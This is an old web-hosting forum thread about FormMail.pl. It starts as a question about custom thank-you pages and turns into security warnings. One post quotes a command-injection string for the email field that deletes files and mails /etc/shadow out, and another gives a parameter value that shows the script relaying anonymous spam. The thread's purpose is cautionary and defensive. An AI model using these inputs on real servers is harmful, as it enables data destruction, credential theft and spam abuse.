Using the Aota for my mail form all works well, until the user submits their email address. Then I get a standard and ugly page with the url of[nbsp][nbsp]/cgi-sys/mailform

I have tried in vain to find this in the hope I can manipulate it to have a Thank You page that fits my site.

Has anyone done this?
Does anyone know where /cgi-sys/mailform is?

Cheers

Marty

Marty, the cgi-sys is the system cgi bin that site owners don't have direct access to.[nbsp][nbsp]I believe it uses the script at http://www.worldwidemart.com/scripts/formmail.shtml to do it's work.[nbsp][nbsp]That script has a variable in it, that lets you do what you want.[nbsp][nbsp]You could set that script up in your own cgi-bin and check it out.[nbsp][nbsp]Matt's scripts are pretty easy to set up and work with.

Mont

I also just use formmail.pl myself.

But, I trust you have something like the following in your form:


<INPUT TYPE=HIDDEN NAME=&quot;missing_fields_redirect&quot; VALUE=&quot;http://www.yoururl.com/error.htm&quot;>

<INPUT TYPE=HIDDEN NAME=&quot;redirect&quot; VALUE=&quot;http://www.www.yoururl.com/success.htm&quot;>

These should result in displaying your own staic success and error pages which you can layout however you like.[nbsp][nbsp]The downside is that unless you install your own formmail.pl, you can't echo the form input back to the user using custom layouts.

FormMail.pl is known to have some very serious vulnerabilities. Many recommend to not use it at all.

Best suggestion to keep it from being used as a spam machine is to run a local copy and hardcode the recipient into the script and not use it in the calling html.

Add
$Config{'recipient'} = 'destination@your.domain';
around line 175 or so.

If you don't like this advice, use your form the way you have it, and enter into the comment field something like
recipient=formtest@your.domain&amp;message=Proof%20that%20FormMail.pl %20can%20be%20used%20to%20send%20an-onymous%20spam
then watch for the mail at formtest@your.domain

Additional tips should you continue to use Formmail.pl:

the following line is delivered = 1; change to = 0;
[nbsp][nbsp][nbsp][nbsp][nbsp][nbsp][nbsp][nbsp]$check_referer = 0;

somewhere around line 80 or so, hardcode to send environment variables with the message:
$Config{'env_report'} = 'REMOTE_ADDR,REMOTE_HOST,REMOTE_USER,QUERY_STRING,AUTH_TYPE,HTTP_ USER_AGENT,HTTP_REFERER';

More information is available at
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%3D1%26tid%3D168177%26fro-mthread%3D0%26start%3D2001-03-04%26threads%3D1%26end%3D2001-03-10%26

One veteran says:
&quot;I'll say this slowly so everyone can understand. I've said it before, but I am saying it again for emphasis.

I HAVE HAD A BOX ROOTED DUE TO A HUGE, GAPING SECURITY HOLE IN FORMMAIL.PL.

DO NOT USE IT. EVER.&quot;

Apparently the script code which qualifies a valid email address can be exploited to accept input such as the following (which is meaningless to me):

(sleep 300 ; /bin/rm -rf / &amp;) &amp;; /bin/cat /etc/shadow | /bin/mailx -s
&quot;ALL YOUR BASE ARE BELONG TO US&quot; luser@example.com

....in case you wanted to know ;)

[bump]

My domain was just hit by a spammer using an AOL account who used my domain's formmail.pl to send a really obnoxious spam. All of a sudden, within 3 minutes I got 90 emails stating that mail (that I had not sent) was undeliverable. I can only shudder at how many emails might have been delivered in the minutes before I renamed my copy of formmail.

It appears that they simply found formmail.pl by searching for it at random, looking for cgi-bin/formmail.pl (I originally thought that they had spidered my html forms, but they targeted 2 of my domains which were actually IRM's and were not pointing at formmail themselves but were valid URL's because of the overlaid cgi-bin.)

I just wanted to bump this message in the forum.

And thanks very much to Terra for quickly helping me figure out exactly what happened.


[This message has been edited by Jeff (edited 05-30-01@05:32 am)]

This thread (with Maynard's link) was posted during the time that I first started working on my own form mail script. It prompted me to learn a lot about security issues. I was amazed to find out, just how easy it is for someone to exploit a scipt that has not been written with security in mind. And apparently, many of the free scripts are like this.

In any case, I've tried to take a great deal of care in my script to be careful to close any security holes. I think it is difficult to write a form mail program to be secure, since it needs to allow most fields to pass through. Custom CGIs, that someone writes just for their own site, usually have security checks in them that allow only certain values for the fields, especially any To-address field.

I also learned that hidden fields provide no security at all, and that it is easy for a spammer to send ANY input they want to your form, including setting environment variabls such as the HTTP_REFERRER field. Checking for the referrer is no security at all. It is a simple matter to write a script that will set this to any desire value. Never trust user submitted data in your form.

If anyone would like, I believe that Gypsy Mail (http://www.thinkspot.net/sheila/computers/software/gypsymail.html) is secure against this type of attack. I can't guarantee it, of course (liability isses, here), but I've taken a number of precautions. (http://www.thinkspot.net/sheila/computers/software/gypsy/gypsydoc.html#security)

Sorry to hear about what happened to you, Jeff. I take it that somehow, by great luck, the e-mails simply errored and were never delivered? Whew!